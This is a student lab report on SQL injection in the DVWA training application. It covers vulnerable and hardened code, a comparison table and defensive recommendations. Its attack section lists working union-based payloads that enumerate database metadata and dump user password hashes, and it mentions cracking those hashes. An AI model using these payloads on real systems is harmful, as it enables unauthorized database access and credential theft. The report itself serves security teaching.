Class: IA1603

Name: Nguyen Hong Thai

Roll number: SE161457
SQL Injection – DVWA
1. Introduction
- SQL injection is a cybersecurity threat where malicious individuals exploit vulnerabilities in
web applications by injecting malicious SQL code. This can lead to unauthorized access, data
theft, or even full control of a database.
- In this lab, the systems asks for user input the ID to get some information from database.

2. Preparation
- Computer running OS windows. Required all firewall are disable.
- Download Xampp and DVWA from github.
- Two machines are Window 7 and Kali.
3. Level Low
- Analysis :

+ Lack of user input validation and handling: In the code, user input ($id) is used in an
SQL query without any form of validation or sanitization. This means that users can
input any value, including special characters or SQL characters like ' or ;, which can be
used to launch SQL injection attacks.
+ Use of meta-characters to execute unauthorized SQL commands: With the ability to
input any value for $id, an attacker can use SQL operators like ' OR 1=1; -- to trick the
SQL query. In this case, the SQL query is altered to return all data in the users table.
Specifically, the original query:
SELECT first_name, last_name FROM users WHERE user_id = '$id';
 After the attack, it becomes:
SELECT first_name, last_name FROM users WHERE user_id = '' OR 1=1;
--';
- Attack:
+ Payload: 1'or'1'='1 (Display all record)

+ Payload: display database version

%'or'1'='1' union select null, version() #
+ Payload: display database user
%'or'1'='1' union select null, user() #

+ Payload: display database name

%'or'1'='1' union select null, database() #
(We notice in the last display line, DVWA is the name of database)
+ Payload: display all table information in information_schema
%'or'1'='1' union select null, table_name from information_schema.tables #

+ Payload: display all the user tables in information_schema

%'or'1'='1' union select null, table_name from information_schema.tables where
table_name like 'user%'#
+ Payload: Display all the columns fields in the information_schema user table.
%'or'1'='1' union select null, concat(table_name,0x0a,column_name) from
information_schema.columns where table_name = 'users' #

+ Payload: Display all the columns field contents in the information_schema user table
%'or'1'='1' union select null,
concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #

=> I save all the account and crack it with crackstation.net.

4. Level Impossible
- Analysis:

+ Validate the user input:

The user input ($id) is first checked to ensure it's a numeric value using the
is_numeric() function. This is a form of input validation that restricts input to numeric
values, which is a good practice to prevent SQL injection.
+ Use of meta-characters to prevent unauthorized SQL commands:
Since the code checks if $id is numeric and uses a prepared statement with
parameter binding, it effectively prevents SQL injection. Even if an attacker tries to inject
SQL commands like ' OR 1=1; --, the use of parameter binding ensures that the input is
treated as data and not executable SQL code. The prepared statement only allows valid
integer values for the user_id, making it resistant to SQL injection.
+ Anti-CSRF Protection:
The code implements anti-CSRF protection by checking a user token
($_REQUEST['user_token']) against a session token ($_SESSION['session_token']). This
helps prevent Cross-Site Request Forgery (CSRF) attacks, ensuring that the request
comes from a legitimate and authenticated source.
5. Comparasion

Security Low Impossible

Requiremen
 t
Input Validation Input is not validated or User input ($id) is checked with
sanitized, allowing any is_numeric() to ensure it's a
value including special and numeric value, preventing non-
SQL characters. numeric input.
Protection against Vulnerable to SQL injection Protected against SQL injection by
SQL Injection attacks as it directly using prepared statements with
includes user input in SQL parameter binding. Input is treated
queries. as data, not executable SQL code.
Use of Meta- Vulnerable to SQL injection Prevents unauthorized SQL
Characters in SQL using meta-characters like ' commands by treating input as
OR 1=1; --. data, and only allows valid integer
values for user_id.
Anti-CSRF No mention of CSRF Implements anti-CSRF protection
Protection protection. by checking user and session
tokens, preventing CSRF attacks.

6. Recommendation
- Use Prepared Statements (Parameterized Queries): Prepared statements are a robust defense
against SQL injection. They allow you to separate SQL code from user input. Most modern
web programming languages and database libraries support prepared statement.
- Input Validation: Validate user input to ensure it matches the expected format and type. Reject
input that doesn't meet your criteria. However, don't rely solely on input validation as it's not a
complete defense against SQL injection.
- Escaping User Input: If you can't use prepared statements, ensure that user input is properly
escaped before including it in SQL queries. Most programming languages offer functions or
libraries to handle this.
- Least Privilege Principle: Ensure that your database user accounts have the least privilege
necessary. Don't use a superuser account for normal application operations. Limit access to only
the required tables and operations.
- Web Application Firewall (WAF): Consider using a WAF to filter and block malicious
requests before they reach your application. WAFs can help detect and prevent various types of
attacks, including SQL injection.